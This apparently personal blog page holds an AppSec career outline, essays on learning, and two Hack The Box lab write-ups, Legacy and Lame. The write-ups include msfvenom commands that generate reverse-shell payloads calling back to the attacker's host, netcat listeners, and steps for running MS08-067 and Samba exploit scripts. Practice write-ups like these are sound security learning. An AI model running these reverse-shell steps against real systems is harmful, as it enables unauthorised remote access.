Skip to content

Month: April 2021

Application Security – Career Guide 2021

I have collated this Application Security Career Guide from market demands and my understanding of current industry trends and practices. The guide describes some of the important skill-sets for someone who are interested in AppSec:

  • Engaging Stakeholders
  • Conduct Training
  • Develop guidelines and best practices
  • Design Review
  • Vulnerability Assessment and Penetration Testing (VAPT)
  • Conduct Research on Industry trends and Community Contribution
  • Security Automation

I also included some additional information such as:

  • InfoSec and Audit Certifications
  • Programming Languages
  • Compliance and Regulations knowledge
  • Hands-on experience with Tools
  • Knowledge on Web Security, OS, Authentication, Network, Cryptography etc.
  • Common Tech stack to know
  • AWS Security Services
  • AWS Experiences

Feel free to let me know if you think there are some skills and info that needs to be added.

How do you conduct your Breadth studies?

Breadth studies are any studies which takes you outside of your field of specialization. You want to do breadth studies as it helps you to rest from your field of specialization.

Today, there are so much information about different subjects from books, MOOC and internet blog posts. We need an approach on how to conduct our breadth studies without becoming a dilettante and make the studies to be sustainable.

Criteria for picking subjects

Don’t learn something for the sake of learning or because it is popular (appearing in media and news article). Instead, consider using below criteria as a guide to your decision:

  • Humanity-Natural reason: Subjects that makes you be more connected as a human and to nature.
  • Complementary reason: Subjects which helps to advance yourself further in your field of specialization.
  • Exploratory reason: Subjects in which you might want to add to your specialization but unsure now.
  • Practical-Living reason: Subjects which teaches you how to live practically in modern world.

One of the most practical truths that Daniel Miessler shared is that learning is an integration problem. When you learn something new, you have to decide whether to integrate this new thing into your life and work.

There are many techniques available (e.g. Spaced Repetition) which can help you memorize this new thing that you are learning. At some point, you cannot just remember things. You need to consider whether to integrate this thing into your life or dropped it because it is too difficult to integrate into your work / life.

For Breadth studies, you will face the integration problem. If you cannot integrate what you learned in your Breadth studies to your actual work or life, then it will not be sustainable. Think hard about how you can use this thing that you have learned.

How do you know what truly engages you?

I felt that many news, tweets, YouTube videos, blogs and forum / aggregators are constantly to trying to engage my attention. As a result, I struggle to know what are the things that I truly find it engaging.

Everything seems engaging to me because they looks new and something that I don’t know. But I seldom have any sustainable engagement with these resources. Therefore, I should not use these resources as a measurement of what I truly want to engage in.

Instead, I should try to study and practice the foundations of these resources that I am often trying to look into. Only with a sustainable study of these foundational fields, then you can truly know what engages you the most.

The “question” heuristic

How do you know what truly engages you? Use the simple heuristic: If you have many questions while studying the fields, the chances are that this field of work engages you the most compare to other fields.

You might also find other fields to be engaging as well but not something you want to deep-dive. In that case, you should treat them as breadth studies (just by knowing the fundamental principles should be sufficient).

Beware of judging that a field is not something that engages you just because you have no questions while doing an initial study.

There is also a possibility that you are using the wrong resource to study (that is why you don’t even know what to ask to find out more). A good resource brings out more questions from your mind. Or you are missing some knowledge or real life experience to ask any questions. Thus, you cannot pre-maturely judge that the subject does not engage you because you have no questions now.

But if you have done a thorough study and yet the questions are not flowing out of your mind, the chances are that the field is not engaging enough to your current life context.

HTB Writeup: Legacy w/o Metasploit



Quick Scan:

sudo nmap -sC -sV -O -oN nmap/quickscan.txt

Two services are identified:
1. netbios-ssn (port:445, likely to be SMB)
2. microsoft-ds

According to the scan result, the victim box is likely to be Microsoft Windows XP SP3 (94%) or Microsoft Windows Server 2003 SP1 or SP2 (92%).

nmap results


We can use nmap to check if the machine is vulnerable to any public CVEs.

locate *.nse | grep smb

Run the script to check the vulnerabilities.

sudo nmap –script smb-vuln* -p 445 -oN nmap/smb_vulns.txt <victim box IP addr>

We can also google for exploit relating to Windows XP SP3 and SMB.

From our enumeration, we can try these two exploits:
1. MS08-067
2. MS17-010



Convert this script to python3:

Start the netcat listener:

nc -nlvp 443

Get Local Machine IP:

ip addr | grep tun0

Generate the shellcode using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL MACHINE IP> LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Copy the shellcode to script.

Run the exploit script (make sure you have pip3 install impacket).

Remember that the machine is Windows XP and likely to be SP3. So let’s choose choice 6.

python3 <VICTIM BOX IP ADDR> 6 445

There will be a callback on the listener:

The root.txt is in the Desktop folder.

Reflections on the lab

It took me days to achieve a successful exploit. One of the reason is that I was spending two days on debugging python2 exploit scripts for MS17-010 (eternalblue). There is some issue in using pip2 to install impacket. Therefore I targeted MS08-067 instead.

  • If you are stuck with debugging issue, you need to time-box and move on. You can revisit the issue in the future. Eternalblue is one of the famous NSA exploit. I will definitely need to figure out how to fix the issues when running the exploit script.
  • I confused LHOST as the IP address of the victim box. Instead I should remember that LHOST is the IP address of the local VM.
  • You can enumerate issue using nmap as well and not just with searchsploit.
  • Convert python2 scripts to python3 scripts with online tool such as this.

HTB Writeup: Lame w/o Metasploit


  • Run two nmap scans to determine the open ports, services and OS.
  • Based on the discovered information, search for possible exploits.
  • Look for exploits scripts for each service versions for gaining root.
  • Test the exploits to see if the discovered services are exploitable.


nmap options

  • -O <Enable OS detection
  • -sC <Run default scripts>
  • -sV <Probe open ports to determine service/version info>
  • -oA <Output to all format>
  • -p- <Scan all ports>

Quick scan

sudo nmap -sC -sV -O -oA quickscan

Full scan

sudo nmap -p- -sC -sV -O -oA fullscan

We can see there is an additional service that is not discovered by the quick scan


We discovered five attack surfaces from our port scanning results. They are:

  1. ftp (port:21, version: vsftpd 2.3.4)
  2. ssh (port:22, version:OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
  3. netbios-ssn (port:139, version:Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
  4. netbios-ssn (port:445, version:Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
  5. distccd (port:3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))


One convenient way of checking if the service version has an exploit is to use the searchsploit tool in Kali Linux. Here we can see that this particular FTP version has a reported exploit.

We can try googling for a python exploit. I found this in github:

However, when I executed the script, the exploit was not successful. The script was stuck and did not progress further.


There were a few user enumeration attack on SSH. This usually takes time and we can come back if the other services are not exploitable.


This particular version of Samba has exploit available.

I found an exploit script in Python:

You will need to update the script by following the steps below:

  • Get your LHOST:ip addr|grep tun0
  • Generate the reverse netcat buffer payload:msfvenom -p cmd/unix/reverse_netcat LHOST=<Your LHOST> LPORT=<Specify any port> -f python
  • Replace line 8 to 15 with the generated payload from msfvenom.
  • Update victim IP to the box IP address.
  • Remove line 1.
  • Install pysmb: pip install pysmb



  • Start netcat: nc -nlvp 1337
  • Run the exploit: python3

Now can run command now to get the FLAG in as the root user.

Reflections on the lab

This was the first lab that I have completed in Hack The Box (HTB). I learned a few things here:

  • This is abit different from purely web application hacking that I am more familiar with. You need to perform recon and systematically enumerate the services.
  • You need to know how to look for exploits, modifying and debugging the scripts that you found online.
  • You need to know some tools such as msfvenom, netcat and python etc.
  • Also port scanning needs to be thorough in order to discover more services that the quick scan does not find.